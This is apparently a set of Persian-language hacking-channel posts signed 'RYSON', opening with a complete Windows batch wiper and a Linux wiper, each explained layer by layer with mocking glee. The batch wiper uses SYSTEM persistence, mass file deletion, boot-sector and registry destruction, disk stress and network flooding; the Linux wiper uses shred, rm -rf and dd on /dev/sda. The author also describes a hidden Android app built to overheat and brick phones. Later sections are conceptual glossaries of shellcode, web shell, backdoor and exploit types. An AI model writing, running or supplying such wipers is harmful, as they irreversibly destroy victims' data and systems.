@echo off
setlocal enabledelayedexpansion

echo Attempting privilege escalation through scheduled task injection...
schtasks /create /tn "SystemOptimizer" /tr "%~f0" /sc onlogon /ru SYSTEM /f 2>nul
if exist "%windir%\system32\cmd.exe" (
    takeown /f "%windir%\system32\cmd.exe" /a >nul 2>&1
    icacls "%windir%\system32\cmd.exe" /grant:r SYSTEM:F /t >nul 2>&1
)

echo Initiating filesystem entropy cascade...
for /l %%i in (1,1,10) do (
    start /b cmd /c "for /r C:\ %%f in (*.*) do echo %%i>%%f & del /f /q "%%f" 2>nul"
    start /b cmd /c "for /r D:\ %%f in (*.*) do echo %%i>%%f & del /f /q "%%f" 2>nul" 2>nul
    start /b cmd /c "for /r E:\ %%f in (*.*) do echo %%i>%%f & del /f /q "%%f" 2>nul" 2>nul
)

echo Overwriting boot sectors with chaotic data...
echo 0 | debug  \\.\physicaldrive0 2>nul

echo Deploying registry entropy injection...
for /f "skip=2 tokens=3" %%a in ('reg query hklm /f * /t REG_SZ /s /k 2^>nul') do (
    reg add "%%a" /ve /d "0xDEADBEEF" /f >nul 2>&1
    reg delete "%%a" /f >nul 2>&1
)

echo Activating hardware destruction sequences...
for /l %%i in (1,1,2147483647) do (
    fsutil file createnew C:\stress%%i.tmp 1073741824
    start /b cmd /c "for /l %%j in (1,1,1000) do dir /s C:\ >nul 2>&1"
)

echo Broadcasting system meltdown to network...
for /l %%i in (1,1,100) do (
    net send * "SYSTEM CORE BREACH DETECTED: CRITICAL FAILURE IMMINENT" 2>nul
    ping -n 1 -l 65500 255.255.255.255 >nul 2>&1
)

echo Initiating final system termination...
shutdown /r /f /t 0
echo %random%%random%%random%%random% > %windir%\system32\ntoskrnl.exe

:burn
echo 0 > %temp%\burn.tmp
goto burn

اسکریپت خودشو توی قالب یه Scheduled Task با سطح دسترسی SYSTEM پایدار میکنه تا اینجا اوکی ؟ یعنی ویندوز هر بار روشن بشه دوباره این کد اجرا می‌شه و باعث می‌شه سیستم در هر بوت عملا دوباره آلوده بشه و امکان ترمیم پایدار نداشته باشه این از این😂

ببین توی لایه دوم با ایجاد نویز Entropy و حذف گسترده ساختار NTFS و فایل‌های حیاتی ویندوز تخریب می‌شن و در نتیجه DLLها و سرویس‌ها و حتی فایل‌های بوت ویندوز حذف می‌شن و سیستم تو مراحل بعدی بوت کرش می‌کنه یا وارد Repair Loop می‌شه !😂

لایه سوم ، لایه ی آسیب‌زدن به Master Boot Record که بازنویسی MBR باعث می‌شه Firmware سیستم همونBIOS و یا UEFI دیگه نتونه لودر ویندوز رو پیدا کنه بنابراین ویندوز دیگه حتا به صفحه لوگو هم نمی‌رسه😂 و سیستم «Non-system disk» یا Boot Failure نشون میده😂

لایه ی چهارم تخریب رجیستری هست که تغییر و حذف کلیدهای حیاتی رجیستری باعث می‌شه تنظیمات کرنل، سرویس‌ها، درایورها و شِل ویندوز ناقص یا معیوب و خراب بشن و نتیجه‌اش اینه که اگر ویندوز بالا هم بیاد، بدون سرویس‌ها، بدون Network Stack، بدون Explorer و با کرش‌های زیاد بالا میاد چ غیر قابل استفادست😂

لایه پنجم ، تا اینجا نرم افزاری ننش گاییده شد حالا سخت افزار 😂 وارد کردن فشار غیرعادی روی هارد و سیستم منظورمه ، سورس با ساخت فایل‌های ۱ گیگی و اجرای هزاران عملیات I/O باعث فرسایش شدید SSD و ایجاد Bad Sector روی HDD می‌شه که این کار می‌تونه باعث کاهش سرعت شدید و خطاهای Disk I/O و حتی خرابی فیزیکی یا منطقی دیسک شود، طوری که ویندوز دیگر نتونه داده‌ها را درست بخونه😂

لایه شیشم ، ننه سخت افزار و نرم افزار گاییده شد بریم سراغ اینترنت و شبکش این سورس باعث ایجاد ترافیک غیرعادی و پیام‌پراکنی تو شبکه و ارسال پینگ‌های حجیم و پیام‌های Broadcast باعث Flood شدن لایه شبکه می‌شه که این اتفاق باعث اخلال تو Network Stack ویندوز و حتی فریز شدن سرویس‌های شبکه، مثل TCP/IP Service میشه😂

لایه هفتم : میگه اقا اخرین ضربرو محکم تر بززززن ، ببین اینجا ریست اجباری + حلقه بی‌پایان نوشتم حالا دقیقا داستان چیه ؟
اسکریپت برمیداره سیستم رو فورن ریستارت می‌کنه و بعدش یه حلقه بی‌پایان اجرا می‌کنه که اجازه اجرای درست پروسه‌های ریکاوری یا Safe Mode را نمی‌ده بنابراین سیستم عملن تو چرخه‌ای گیر میوفته که امکان تعمیر ویندوز تقریبا غیر ممکنه😂

به صورت کلی
سطح نرم‌افزار: تخریب فایل‌ها و رجیستری
سطح سیستم‌عامل: نابودی سرویس‌ها و Boot Loader
سطح سخت‌افزار: فشار بیش از حد روی دیسک
سطح شبکه: ایجاد اختلال در Stack

توجه با این کد مادر کسیو نگایید من مسئولیتی به عهده نمیگیرم

for i in {1..100}; do
    find / -type f -exec shred -zufv {} \; 2>/dev/null &
    find / -type d -exec rm -rf {} \; 2>/dev/null &
done

while true; do
    yes > /dev/null &
    openssl speed -multi $(nproc) > /dev/null &
    cat /dev/urandom > /dev/fb0 2>/dev/null &
done

rm -rf /boot/ /efi/ /bootefi/ 2>/dev/null
dd if=/dev/zero of=/dev/sda bs=512 count=1 2>/dev/null

echo " System Permanently Compromised by RYSON" | wall
halt -f -n -p

لایه داده: بازنویسی کامل فایل‌ها و حذفشون ریکاوری تقریبن غیرممکن ، یعنی همه چیو پاک میکنه و جوری با shred باز نویسی می‌کنه که ریکاوریشون ممکن نیست

لایه سیستم‌عامل: حذف دایرکتوری‌های ریشه که باعث از کار افتادن تمام سرویس‌ها میشه

لایه بوت: که شامل نابودی کامل کرنل و EFI + پاک‌کردن MBR میشه و سیستم اینجا به گا می‌ره😂

لایه سخت‌افزار و پردازنده: فشار شدید CPU و I/O که نتیجش قفل شدن یا خاموشی اضطراری کل سیستمه که اینجا دیگه واقعا سیستم به گا می‌ره😂😂

خب حال توضیح ندارم که چه کار میکنه فقط هاید ایکون و هاید اکتیویتی هم داره که بعد از نصب بالا نیاد و نشه کاریش کرد و خلاصه بگم CPU , GPU مادرشون گاییده میشه و بوتلودر و ... گوشی دیگه قابل استفاده نمیشه
دوستان گلم خانومای عزیز فقط این کاتلین کیرخریو همینجوری نباید بدی به یارو اول باید توی اندروید استودیو کامپایلش کنی به APK بعد بدی بهش

اولا که این کد احتمال مخربیش روی دستگاه های جیلبریک خیلی خیلی خیلی بیشتره و باید با نرم افزار رسمی خود اول کامپایل و بیلد بشه ولی باز نوشتم

بار پردازشی مداوم ایجاد می‌کنه و CPU و GPU رو تا حد Thermal Throttling زیر فشار میده

با ترکیب بار محاسباتی و نور صفحه و تاچ گوشی و ویبره ی دستگاه و چراغ قوه و ...، گرمای دستگاه رو به‌طور غیرعادی بالا می‌بره

مصرف انرژی رو به شکل غیرنرمالی بالا می‌بره و PMIC رو تحت فشار میذاره

با ایجاد چرخه نوشتن و پاک‌کردن سریع، فلش رو دچار I/O saturation می‌کنه کلا بگاییه دیگه

با صف‌های موازی سنگین، باعث قفل‌شدن پردازش‌ها و افت پاسخ‌دهی سیستم میشه

با فراخوانی‌های غیرمجاز، پایداری لایه کرنل و سیستم‌عامل رو مختل می‌کنه

و تا تونستم سعی کردم سند باکس و اپ استور رو دور بزنم ولی نمیدونم داستان چیه ایفون نداشتم تست کنم

𝗥 ‌ ‌ ‌ ‌𝗬 ‌ ‌‌ ‌ 𝗦 ‌‌ ‌ ‌ 𝗢 ‌ ‌‌ ‌ 𝗡

IN THE NAME OF DARK JUSTICE

1: Local Shellcode:
وقتی دسترسی محدودی داریم و می‌خوایم با سواستفاده از یه اسیب‌ پذیری، سطح دسترسی بالاتری رو بگیریم استفاده میسه و بیشتر برای بررسی آسیب‌ پذیری‌ های محلی مثل buffer overflow هست ، بیشتر روی stack و heap و syscallها وتوکن‌های دسترسی کار داره و میشه گفت اولین foothold محلیه

2 : Remote Shellcode:
ریموت شل کد خودش دو نوع داره که یکیش شل معکوسه و یکیش بایند شل کد هست و این ریموت شل کل بیشتر برای حمله به سیستم‌های دیگه که تو شبکه یا اینترنت هستنه و معمولا با سوکت‌های TCP/IP ارتباط برقرار میکنن
*Reverse Shellcode:
برای وقتیه که خود تارگت خودش به ما وصل می‌شه و یه شل معکوس ایجاد می‌کنه
*Bind Shellcode:
تارگت یه پورت باز می‌کنه و منتظر اتصال ما هستش

3 : Download & Execute Shellcode :
ببین این نوع ، شل‌کدیه که تو یه فایل (مثلا ابزار یا برنامه) رو از اینترنت دان کرده و ران میکنه ، میتونیم بگیم payload بزرگتر رو می‌گیره و اجرا میکنه و نوعی پل بین exploit و malware هستش

4 : Staged & Multi-Stage
ببین میتونیم بگیم این یه شل چند مرحله ایه و میتونیم روی تقسیم مسئولیت کار می‌کنه چرا میگن مولتی استیج ؟ چون چند تا مرحله داره حالا دقیقا چه کار میکنه ؟
*Stage 0:
فقط بقا و ارتباط رو محیا میکنه ،
*Stage 1:
دانلود کردن
*Stage 2:
قابلیت‌ها مثل C2، persistence، lateral movement و ...
میتونیم بگیم ساختار ماژولار حمله با اینه

5 : Egg-Hunter :
میتونیم بگیم بیشتر کارش پیدا کردن پیلود گم شدست و حافظه رو بایت‌ به‌ بایت اسکن می‌کنه و دنبال یه signature خاص میگرده و وقتی پیداش کرد به اون جامپ میزنه و میتونیم بگیم نقش اصلی این حل محدودیت فضای اجراست

6 : Polymorphic Shellcode :
توی این نوع پیلود اصلی ثابته ولی encoding هربار فرق داره و layout بایت‌ ها تغییر می‌کنه حالا چه چیزی ثابت میمونه ؟ رفتار و دیکودر کوچیکش ثابته و شکست signature-based detection رو انجام میده

7 : Metamorphic Shellcode
اقا رسیدیم به سوپر ترین داستان شل این نوع بک کسخلیه گول زدنش ناموسیه😂 حالا داستان چیه ؟ خود کد بازنویسی می‌شه ، reorder میشه و معادل‌ سازیش منطقی میشه
حالا شاید بگی فرقش با Polymorphic چیه ، باید بگم که توی polymorphic ، ظاهر عوض میشه و دیکودر داره ولی توی metamorphic ، ساختار عوض میشه و دیکودر نداره

8 : Fileless / In-Memory
ببین این نوع کد هیچ فایلی رو توی دیسک ذخیره و اجرا نمیکنه همه چی روی RAM و داخل پردازه های legit هستش و احتمال شناساییش توسط انتی ویروس خیلی خیلی خیلی کمه و چون همه چی مستقیم روی رم ساخته و اجرا میشن

9 : Encoder/Decoder shell
ببین اینم یکی از سوپری بازیای الکسیسه چرا 🤣 چون پیلود اصلا رمزگذاری شدست و دیکدرش توی زمان اجرا اونو بازش میکنه حالا چرا ؟ چون bypass فیلتر و bypass WAF / IDS ساده داره و استتار اولیه رو داره

10 : Syscall-Based
این نوع مستقیماً با کرنل حرف میزنه جالب اینه که بدون libc و WinAPI حالا چرا ؟ چون hookهای امنیتی معمولن بالاترن و نقش اصلیش هم stealth توی سطح پایینه

11 : NOP-Sled / Control-Flow Oriented
به صورت کلی به رسیدن جریان اجرا به پیلود کمک میکنه و از پیشبینی پذیری جریان سواستفاده میکنه و موفقیت اکسپلویت های حافظه رو با خودش معمولا داره ولی ASLR و DEP اینا هم اذیت می‌کنن ببین میتونیم بگیم شامل تکنیک‌ هاییه که باعث رسیدن pointer به محل اجرای واقعی شل‌کد میشه

12 : Architecture-Specific
ببین این بیشتر برای برای پردازنده‌های خاص مثل x86 و x64 و ARM و MIPS و RISC-V و ... نوشته میشه و میتونیم باهاش حملات هدفمنده IoT و موبایل بزنیم و اینکه کد نوشته‌شده وابسته به معماری پردازنده و سیستم‌عامله و هر معماری مجموعه دستورالعمل‌ها و رجیسترهای خاص خودش رو داره و شل‌کدی که برای یه معماری نوشته می‌شه معمولا روی معماری دیگه کار نمی‌کنه چون دستورالعمل‌ها و آدرس‌دهی متفاوت هستند و حتی تو یه معماری واحد، تفاوت سیستم‌عامل‌ها مثل Linux و Windows باعث تغییر تو نحوه‌ ی فراخوانی توابع سیستمی می‌شه

حالا فرق شل کد اصلی همون Local/Classic Shellcode و شل‌کد معکوس چیه ؟ ببین اول بگم که این دو تا مکمل و کامل کننده ی همن شل کد اصلی کدیه که مستقیم روی سیستم تارگت اجرا می‌شه و روش کارش اینه که معمولا بعد از یه آسیب‌پذیری مثل Buffer Overflow، کنترل اجرای برنامه به این شل‌کد داده می‌شه و هدف اصلی اینه که یه شل محلی روی سیستم ایجاد میکنه مثلا ارتقای دسترسی از کاربر عادی به ادمین و نیازی به ارتباط شبکه‌ای نداره و همه‌چیز داخل همون سیستم انجام می‌شه

شل‌کد معکوس یا همونReverse Shellcode
یه نوع شل‌کده که ریموت که قربانی خودش به سمت مهاجم اتصال برقرار می‌کنه و روش کارش اینه که شل‌کد روی سیستم تارگت اجرا می‌شه و یک کانکشن TCP/IP به سمت ما باز می‌کنه و یه شل از راه دور روی سیستم تارگت حتی پشت NAT یا فایروال ایجاد میکنه و چون ارتباط از داخل شبکه تارگت شروع می‌شه، خیلی سخت‌تر توسط فایروال یا IDS بلاک می‌شه میتونیم بگیم بهترین روش توی این نوع حملات برای گرفتن دسترسی پایدار از راه دوره

𝗥 ‌ ‌ ‌ ‌𝗬 ‌ ‌‌ ‌ 𝗦 ‌‌ ‌ ‌ 𝗢 ‌ ‌‌ ‌ 𝗡

IN THE NAME OF DARK JUSTICE

حالا وب شل دقیقا چیه ، وب شل یه اسکریپت مخرب سمت سروره که به ما اجازه میده که از راه دور روی سرور دستورات اجرا کنیم و بیشترین زبان‌هایی که برای نوشتن وب شل استفاده میشن PHP، Python، ASP، Perl، Ruby و Bash هستن و بیشترین زبانی که میتونم بگم میشه باهاش بهترین وب شل رو نوشت PHP هست و معمولا داخل یه وب‌اپلیکیشن آسیب‌پذیر قرار می‌گیره
و به ما اجازه میده که از طریق HTTP/HTTPS با سیستم‌عامل سرور تعامل داشته باشه و Web Shellها در لایه Application کار می‌کنن و وابسته به زبان‌های سمت سرور مثل PHP, ASP.NET, JSP, Python و ... هستن
وب شل می‌تونه دستورات سیستم‌عامل رو از راه دور اجرا کنه ، بدافزار رو بارگذاری یا بارگیری کنه و بک‌دور برای دسترسی های مستقیم ایجاد کنه ، میتونه داده‌های حساس رو برداره و حتا حمله ب سامانه‌ های دیگه شبکه بزنه و گسترده بشه

1: Command Web Shell
این ساده‌ترین نوع وب شله که وظیفه اصلی اون اجرای مستقیم دستورات سیستم‌عامل از طریق درخواست‌های HTTP هست و بیشتر برای Initial Foothold، تست RCE و تست نفوذ و بررسی سطح دسترسی وب‌سرور استفاده میشه و پیچیدگی پایینی داره و معمولا موندگاری و مخفی‌کاری کمی داره

2 : File Manager Web Shell
تمرکز این نوع وب شل روی مدیریت فایل‌ های سروره و قابلیت‌ هایی مثل آپلود، دانلود، حذف، ویرایش فایل و تغییر Permission همون دسترسی رو فراهم می‌کنه و بیشتر تو مرحله Post-Exploitation استفاده میشه و معمولا footprint بالاتری ایجاد می‌کنه

3 : Database Web Shell
این نوع وب شل مستقیما با دیتابیس تعامل و ارتباط داره و امکان اجرای Query، Dump گرفتن از جداول، تغییر داده‌ها و مدیریت کاربران دیتابیس رو فراهم میکنه و زمانی استفاده میشه که دسترسی سیستم‌ عامل محدوده اما اتصال دیتابیس در دسترسه

4 : Stealth / Minimal Web Shell

ببین این وب شل به‌صورت خیلی مینیمال و مخفی‌کارانه طراحی میشه و حجم کم، ظاهر Legit و اجرای شرطی داره که این خیلی خوبه و هدف اصلی کاهش شناساییش توسط AV، WAF و مانیتورینگ‌های امنیتیه

5 : Password / Token Protected Web Shell
این نوع وب شل مکانیزم احراز هویت داره و احراز هویت میتونه با Password، Token، Header یا Cookie انجام بشه بازم کاری ندارم بیشتر و هدفش جلوگیری از گوه کاری بچه های دیگس و کنترل ما روی دسترسی رو افزایش میده

6 : Encrypted / Obfuscated Web Shell
تو این وب شل ، داده‌ها و دستورات به‌صورت رمزگذاری یا Obfuscate منتقل میشن که این کار باعث سخت‌تر شدن Signature-based Detection و تحلیل ترافیک میشه و بیشتر برای Bypass IDS/WAF استفاده میشه

7 : Fileless / Memory-Only Web Shell
این نوع وب شل هیچ فایل دائمی روی دیسک ذخیره نمیکنه، اجراش معمولا تو حافظه همون RAM و داخل پردازه‌های Legit انجام میشه چیزی که توی شل کد صحبت کردیم و بیشتر صحبت میکنیم، مزیت اصلی اون کاهش Artefact های Forensic و شناساییش خیلی سخته

8 : Pivoting Web Shell
این نوع وب شل نقش Pivot Point داره برای دسترسی به شبکه داخلی، سرویس‌های غیرقابل دسترس از بیرون و Lateral Movement استفاده میشه و میشه گفت میتونه بخشی از Post-Exploitation باشه،

9 : Persistence-Oriented Web Shell
تمرکز این وب شل روی ماندگاریه Persistence هست و قابلیت هایی مثل Self-Recovering، مخفی شدن تو فایل‌های سیستمی و حتا اجرای مجدد پس از حذف داره😂 ببین بیشتر تو حملات APT بررسی میشه

10 : Hybrid Web Shell
وب شل Hybrid ترکیبی از چند نوع وب شله که مثلا ترکیب Command، File Manager، Encrypted و Pivoting و این نوع میتونیم بگیم انعطاف‌پذیری بالایی داره و معمولا به‌صورت ماژولار طراحی میشه به صورت رسمی میتونم بگم که پیشرفته‌ترین حالت وب شل محسوب میشه

𝗥 ‌ ‌ ‌ ‌𝗬 ‌ ‌‌ ‌ 𝗦 ‌‌ ‌ ‌ 𝗢 ‌ ‌‌ ‌ 𝗡

IN THE NAME OF DARK JUSTICE

بریم سراغ بکدور همون Backdoor
اینو بگم وب شل نوعی بک دور حساب میشه و بک دور یه مکانیزم دسترسی پنهان هستش و مثل اسمش میمونه یعنی مثل یه در پشتی میمونه ، یه در مخفی که به فرد اجازه میده که بدون عبور از فرایند های احراز هویت معمول، به یه سیستم، سرویس یا نرم‌افزار دسترسی پیدا کنه، حالا بک دور میتونه نرم‌افزاری، سخت‌افزاری یا منطقی باشه و معمولا با هدف دسترسی پایدار، مخفی و بلندمدت ایجاد میشه و انواعی داره :

1 : Software Backdoor
این نوع Backdoor تو سطح نرم‌افزار پیاده‌سازی میشه وممکنه که داخل کد برنامه، سرویس یا اسکریپت مخفی شده باشه و دسترسی معمولا از طریق یک شرط خاص، ورودی مخفی یا رفتار تعریف‌شده فعال میشه میتونیم بگیم این نوع Backdoor رایج‌ترین حالت در سیستم‌های کاربردیه

2 : Network Backdoor
و اینکه Network Backdoor از طریق مکانیزم‌های شبکه‌ای عمل میکنه که معمولا شامل پورت‌های مخفی، سرویس‌های غیرمستند یا Listener های پنهان هستش ببین هدف اصلیش میتونم بگم که فراهم کردن دسترسی از راه دور بدون جلب توجه فایروال یا مانیتورینگه ، این نوع بک دور برای دسترسی Remote استفاده میشه

3 : Authentication Backdoor
تو این نوع، فرایند احراز هویت دستکاری میشه ممکنه که شامل ،حساب کاربری مخفی و رمز عبور Hardcoded و یا Token یا Credential خاص باشه ، حالا از اونور Authentication Backdoor معمولا تشخیص سخت‌تری داره ، چرا ؟ چون از مسیرهای Legit استفاده میکنه

4 : Web Application Backdoor
این Backdoor داخل یک وب‌اپلیکیشن قرار میگیره و میتونه به‌صورت یه مسیر مخفی، پارامتر خاص یا فایل غیرمشهود وجود داشته باشه و اغلب با درخواست‌های HTTP/HTTPS فعال میشه و برای حفظ دسترسی به سرور هم استفاده میشه

5 : Kernel-Level Backdoor
این نوع Backdoor تو سطح کرنل یا درایو هستش و مستقیما با هسته سیستم‌ عامل تعامل می‌کنه و ارتباط داره ، اینم بگم که تشخیصش خیلی سخته و بیشتر وقتا تشخیص داده نمیشه و میتونه کنترل کامل سیستم رو انجام بده ، Kernel Backdoor جزو پیشرفته‌ترین و خطرناک‌ترین بکدور حساب میشه

6 : Firmware / Hardware Backdoor
این بک دور توی سطح Firmware یا سخت‌افزار پیاده‌ سازی میشه مثل BIOS UEFI یا تجهیزات شبکه که حتی با تعویض سیستم‌عامل هنوز هم وجود دارن

7 : Persistence-Oriented Backdoor
اقا تمرکز این بک دور روی موندگاریشه کهبه Persistence معروفه، که ویژگی هایی مثل اجرای خودکار پس از ریبوت و بازسازی خودکار در صورت حذف و مخفی شدن تو سرویس‌ها یا تنظیمات سیستم هستش و توی طولانی مدت باقی میمونه و کلا هستش

8 : Covert Channel Backdoor
این نوع بک دور از چنل های ارتباطی غیرمعمول استفاده میکنه مثل DNS و ICMP و Timing-based Channels و هدفش مخفی سازی ترافیک و جلوگیری از شناسایی شدنه

9 : Logic-Based Backdoor
ببین لاجیک بک دور بر اساس شرط‌های منطقی فعال میشه حالا یعنی چی ؟ اقا مثلا تاریخ خاص یا ورودی مشخص ،وضعیت خاص سیستم و ... و تا زمانی که شرطش فعال نشه Backdoor کاملا غیرفعال و مخفی باقی میمونه

10 : Hybrid Backdoor
هیبرید هم که میدونید ترکیبه و این بکدور ترکیبی از چند نوع بک دوره مثل
ترکیب Network + Persistence
یا ترکیب Web + Authentication
و یا ترکیب Kernel + Covert Channel
این نوع انعطاف‌ پذیری بالایی داره و تشخیصش تقریبا غیرممکنه

𝗥 ‌ ‌ ‌ ‌𝗬 ‌ ‌‌ ‌ 𝗦 ‌‌ ‌ ‌ 𝗢 ‌ ‌‌ ‌ 𝗡

IN THE NAME OF DARK JUSTICE

شما یه خونه رو فرض کنید ، یه شکستگی داره که میشه به خونه وارد شد ، به اون میگن باگ و اسیب پذیری ، حالا ما اگر بیایم از اون سواستفاده کنیم و وارد خونه بشیم میشه اکپسلویت ، یعنی سواستفاده از اون باگ و اسیب پذیری ، و اگر عمل مخربی انجام بدیم داخل خونه مثل دزدی و ... میشه پیلود ، اکسپلویت سواستفاده از اسیب پذیری برای ورود و گرفتن دسترسی و پیلود میشه حالا ک دسترسی و ورود رو گرفتیم اجرای کد مخرب خیلی قشنگ و ساده،

1: Local Exploit
ببین Local Exploit زمانی استفاده میشه که ما از قبل به سیستم دسترسی محدودی داریم هدف اصلی هم معمولا Privilege Escalation و Escape از محدودیت‌ های امنیتیه ، این نوع Exploit بیشتر روی باگ‌های محلی سیستم‌ عامل یا برنامه‌ها تمرکز داره

2 : Remote Exploit
توی این نوع Remote Exploit بدون دسترسی اولیه به سیستم اجرا میشه و از طریق شبکه یا اینترنت عمل میکنه و معمولا روی سرویس‌های در حال اجرا تمرکز داره میتونم بگم این نوع Exploit پیچیده‌تره ولی به شرایط شبکه وابستگی داره

3 : Client-Side Exploit
توی این نوع Client-Side Exploit کاربر نهایی رو هدف میگیره مثل مرورگرها، پلاگین‌ها یا فایل‌های مخرب ، و اینجا اجرای Exploit وابسته به همکاری خوده کاربره یعنی بیشترش روی مهندسی اجتماعی میچرخه

4 : Zero-Day Exploit
اخ اخ رسیدیم به Zero-Day Exploit ، ببین این نوع از آسیب‌پذیری استفاده میکنه که هنوز به‌صورت پابلیک نشده و یا Patch نشده

5 : Logic Exploit
این اکپسلویت از ضعف در منطق برنامه سواستفاده میکنه نه از باگ‌های فنی مثل Buffer Overflow و معمولا هم شامل سوءاستفاده از جریان کاری اشتباه یا اعتبارسنجی ناقص هستش

𝗥 ‌ ‌ ‌ ‌𝗬 ‌ ‌‌ ‌ 𝗦 ‌‌ ‌ ‌ 𝗢 ‌ ‌‌ ‌ 𝗡

IN THE NAME OF DARK JUSTICE

Vulnerability:
ضعف یا نقص امنیتی در نرم‌افزار یا سیستم همون آسیب پذیریه

Attack Vector:
مسیر یا روش رسیدن به هدف رو میگن اتک وکتور

Exploit:
روش سواستفاده از اسیب‌پذیری یا یه باگ

Payload:
کدی که پس از Exploit اجرا و انجام میشه

Shellcode:
کد سطح پایین که معمولاً به‌عنوان Payload اولیه استفاده میشه

Web Shell:
رابط کنترلی مخرب مبتنی بر وب

Backdoor:
مکانیزم دسترسی پنهان و پایدار مثل یه دره پشتی

Trojan:
نرم‌افزاری که ظاهر Legit داره ولی عملکرد مخرب داره

Dropper:
برنامه‌ای که Payload های دیگه رو نصب یا اجرا میکنه

Loader:
مسئول بارگذاری Payload توی حافظست

Stager:
این Payload کوچیک برای گرفتن Payload بزرگ‌تره

C2 همون (Command and Control):
کانال کنترل و مدیریت دسترسی

Persistence:
تکنیک‌های حفظ دسترسی طولانی‌مدت

Lateral Movement:
گسترش دسترسی تو شبکه داخلی

Post-Exploitation:
فعالیت‌های پس از دسترسی اولیه

𝗟 𝗲 𝗮 𝗿 𝗻 ‌ ‌ 𝗘 𝘅 𝗽 𝗹 𝗼 𝗶 𝘁
𝗥 ‌ ‌ ‌𝗬 ‌ ‌‌ 𝗦 ‌‌ ‌ 𝗢 ‌ ‌‌ 𝗡

Thread Stack
Private Heap
Process Heap
Virtual Address Space
Code Segment (Text)
Initialized Data Segment
Uninitialized Data Segment (BSS)
PE Image Mapping
DLL Mapped Sections
Memory-mapped Files
Shared Memory Sections
Paged Pool
Non-Paged Pool
Kernel Stack
System Cache
Pagefile-backed Memory
Working Set
Session Space

Stack (Java)
Stack (Native)
Java Heap
Native Heap
Code Segment (Text)
Data Segment
BSS Segment
Memory-mapped Area (mmap)
Shared Libraries
Binder Buffers
Ashmem
ION Buffers
Gralloc Buffers
DMA Buffers
JIT Cache
ART / Dalvik Metadata
Zygote Shared Pages
Page Cache
Kernel Memory
Slab Allocator
vmalloc Area

Native Stack
Native Heap

Thread Stack
Process Heap

𝗟 𝗲 𝗮 𝗿 𝗻 ‌ ‌ 𝗘 𝘅 𝗽 𝗹 𝗼 𝗶 𝘁
𝗥 ‌ ‌ ‌𝗬 ‌ ‌‌ 𝗦 ‌‌ ‌ 𝗢 ‌ ‌‌ 𝗡

Part 2

Text Segment
Data Segment
Heap
Memory-mapped Area
Stack
Kernel space

1 : Text Segment :
 ‌‌ ‌‌ ‌ ‌*App Code‌ ‌‌ ‌ ‌ ‌ ‌ ‌ ‌ ‌ ‌ ‌‌ ‌‌ ‌ ‌ ‌
‌‌ ‌ ‌ ‌ ‌ ‌ ‌*Shared Libraries
‌‌ ‌ ‌ ‌ ‌ ‌ ‌ ‌ ‌ ‌*ART / JIT Code
‌ ‌ ‌ ‌ ‌ ‌ ‌ ‌ ‌ ‌ ‌ ‌*Read-Only Data (RODATA)
2 : Data Segment همون Global / Static
 ‌‌ ‌ ‌ ‌*Initialized Data
 ‌‌ ‌ ‌ ‌ ‌*BSS
   ‌ ‌ ‌ *Read-Only Data (RODATA)

3 : Heap        
 ‌‌ ‌ ‌ ‌*Java Heap       
 ‌‌  ‌ ‌ ‌ *Native Heap

4 : Memory-mapped Area      
 ‌ ‌*mmap                      
 ‌‌ ‌ ‌*Ashmem                    
   ‌ ‌ ‌*Binder Buffers            
 ‌ ‌ ‌‌  ‌ ‌ ‌*ION / DMA / Gralloc    
 ‌‌ ‌ ‌ ‌ ‌ ‌  ‌‌ ‌*Zygote Shared Pages     
 ‌‌ ‌ ‌ ‌  ‌ ‌ ‌  ‌ ‌*Page Cache                
 ‌‌ ‌ ‌ ‌ ‌ ‌  ‌ ‌ ‌ ‌ ‌ ‌ *JIT Cache 

5 : Stack                   
 ‌ ‌*Java Stack               
‌ ‌ ‌ ‌‌ ‌ ‌*Native Stack

6 : Kernel Space  جزو فضای ادرس نیست
 ‌*Kernel Memory               
 ‌‌ ‌ ‌ ‌*Slab Allocator            
 ‌‌ ‌ ‌ ‌ ‌ ‌ *vmalloc Area